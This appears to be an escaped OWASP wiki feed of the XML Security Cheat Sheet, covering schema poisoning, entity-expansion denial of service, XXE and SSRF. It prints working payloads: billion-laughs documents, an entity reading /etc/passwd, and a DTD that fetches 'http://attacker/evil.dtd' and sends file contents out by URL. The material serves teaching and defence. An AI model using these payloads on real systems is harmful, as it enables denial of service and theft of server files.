 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224430</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224430"/>
				<updated>2016-12-21T20:18:16Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
